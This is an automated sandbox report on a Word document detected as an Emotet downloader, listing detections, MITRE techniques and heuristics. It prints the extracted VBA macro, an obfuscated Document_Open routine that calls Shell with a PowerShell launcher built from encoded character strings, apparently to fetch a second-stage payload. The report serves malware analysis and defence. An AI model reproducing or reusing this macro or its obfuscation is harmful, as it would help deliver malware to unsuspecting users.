MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7349880-0. Static analysis revealed a Document_Open macro that utilizes the Shell() function. This function is used to execute a command, likely to download and run a second-stage payload, which is a common Emotet behavior.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-7349880-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7349880-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12755 bytes |
SHA-256: 347910f87200f340373ba871418a209c158194d40e79fc0d7b5ab5c7f1b3bd8a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "mQYlTssFXIz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ECQFzWdOfWj()
On Error Resume Next
oiGoYF = 59083 + OEaAfo + (52366 * CDbl(klOwA) - XcfSF / CSng(41707) - qmIWzi / Hex(sEzoaC) + 8926 - 94266)
LPQwvd = Sqr(31438)
TBBMvF = DOBJi
ksnLdI = AJEYS - djJnP / 61528 / ZXzwaB - 223327908 + Hex(DpZtM) * NmHqc - Round(28880)
dWMurl = 54941 + CLjLMw + (8567 * CDbl(ZSLAku) - GzQvsm / CSng(37664) - QNOsra / Hex(zqmGq) + 57212 - 63805)
TiEqKn = Sqr(94942)
soRzji = hjGIf
NilFub = kCicTz - DNQMTU / 27472 / DGZNwM - 223327908 + Hex(wJuSjA) * FUSYB - Round(3649)
iifhid = 94928 + ZiAOz + (87865 * CDbl(vtvTM) - vFMXa / CSng(65181) - WLZqSQ / Hex(apltXE) + 98083 - 67324)
MbYlj = Sqr(57682)
IANpV = rZzUcQ
ZJDMj = TJDvB - NIKvhO / 62996 / IBvHZ - 223327908 + Hex(nzwCw) * sHAjO - Round(7766)
DXuYN = 92568 + WlUNBw + (80725 * CDbl(GIdjdT) - lhLTFJ / CSng(83122) - zQKaIV / Hex(cTSRY) + 31338 - 1465)
odMZP = Sqr(2941)
BVbqcC = VJCjr
zODYl = Nurdf - XwqYh / 41025 / jKNLuO - 223327908 + Hex(TWpskb) * ZQwXkj - Round(98221)
ECQFzWdOfWj = vTEJwtGZPzn + VBA.Shell(AVzGGcXUcD + Chr(nzDAjD + vbKeyP + FoRuXfEEPTI) + "owers" + ErjNHiAdEtp + oAbEjchtH + TmLGnsb + ZasHTVZPfE, 9322 - 9322)
NmCIJ = 2227 + qFwsDj + (96308 * CDbl(uBzluR) - lXBGHB / CSng(47093) - MjGGLd / Hex(OaiEYT) + 55366 - 91007)
bfkDEi = Sqr(34478)
YbotI = RzFfDV
DaAfHD = sSVmMz - mCBmW / 6893 / tSJcMi - 223327908 + Hex(RVfiOi) * ldOHX - Round(77535)
lKIrC = 90146 + SbzqH + (94928 * CDbl(WAZnf) - PdnVSt / CSng(39539) - ijTNSA / Hex(rdlLMw) + 42455 - 70957)
HilYf = Sqr(85315)
Fzqjr = thBRL
OlMzI = nZJaw - sdcowa / 59672 / nbTBt - 223327908 + Hex(iNjHvw) * aEbGBk - Round(39617)
End Function
Private Sub Document_open()
On Error Resume Next
nSKFP = 85537 + pCiAt + (32822 * CDbl(AivqK) - bZhAGz / CSng(99711) - pSzwVG / Hex(JvvUc) + 31686 - 43042)
HBsbFi = Sqr(22150)
MBmBms = ftowAU
IqmsNl = wQsrA - jEYKIr / 74181 / ViRFZ - 223327908 + Hex(zOXuD) * ZpGiND - Round(45853)
mHVnnM = 22276 + swnWKr + (96032 * CDbl(wETBDR) - sjKwCu / CSng(12518) - PFjCwN / Hex(PLZMLl) + 71543 - 99250)
jziUs = Sqr(39143)
wEjZWP = wURznY
pVIdD = NJplBY - iozbV / 79888 / brFNH - 223327908 + Hex(FODPlD) * hrhpkW - Round(72212)
ECQFzWdOfWj
zQvWUY = 97357 + aAwcj + (75762 * CDbl(JrzDJ) - VfitB / CSng(59443) - DMmAi / Hex(tQuOCN) + 99269 - 18756)
akkwmn = Sqr(80005)
QWajNi = uzCwDM
zzDkb = QcStiC - Nztwt / 82132 / cwqJB - 223327908 + Hex(FtJDr) * NBnBiB - Round(34074)
iCIuiC = 61746 + TPBzo + (23181 * CDbl(vOwbK) - qMXouq / CSng(84730) - SCwkn / Hex(ktkTP) + 99289 - 14669)
URXSW = Sqr(75631)
imjTVG = MnqAtw
cDRlor = kFnMoQ - MDNBt / 78781 / ddMLd - 223327908 + Hex(sFRcT) * Oqzhw - Round(97823)
End Sub
Attribute VB_Name = "uIffDLrSHOJ"
Function ErjNHiAdEtp()
On Error Resume Next
fUWBt = Sqr(39882)
tXQRTw = WMdmL - StmujD / 49386 / FsufHv - 223327908 + Hex(OkwDTU) * cSzSKs - Round(3620)
TZpjUF = JiSOj
CuFTd = 68739 + tLtUJS + (23759 * CDbl(RkvzRz) - cjGAz / CSng(78020) - sziOl / Hex(JYfCD) + 72703 - 80220)
IKMJTQjM = "HeLL &" + "( $EnV:CoMspec" + "[4,2" + "4,25]-JOIn'')" + "(-jOI" + "n ( '112D0w61m3" + "9m" + "34j23F1" + "16S105S"
uWUOdI = Sqr(95316)
GBKqj = wJbTB - SrITW / 73090 / lJzza - 223327908 + Hex(VEiqRi) * QKOJn - Round(12524)
YQaIq = ibVqvw
iVlLDU = 14268 + firNTR + (38568 * CDbl(NshrmU) - FzFLjI / CSng(55842) - YVKzz / Hex(HHXup) + 87985 - 65260)
dYZYQHI = "116" + "j58,49m35m1" + "21S59&54D6" + "2{49{" + "55S32{116F38" + "!53S58&" + "48w" + "59j57S111,112" + "w17&6"
tvKjKI = Sqr(18449)
PUbkrk = fcBLG - vciBO / 1714 / XtcEm - 223327908 + Hex(hATuX) * uaEWwC - Round(51322)
vJNTVr = RDOAr
CMEJEk = 89126 + HPSJo + (63577 * CDbl(HcwfQ) - Kbvdb / CSng(66307) - EBUqan / Hex(DGFFD) + 23397 - 38527)
zjLiWiBjjzn = ",32!6,27&50{11" + "6&105{116&58" + "m49S35,121m59{" + "54,62m49F" + "55S32{11" + "6!7" + "S45,39F32,49" + "S5"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.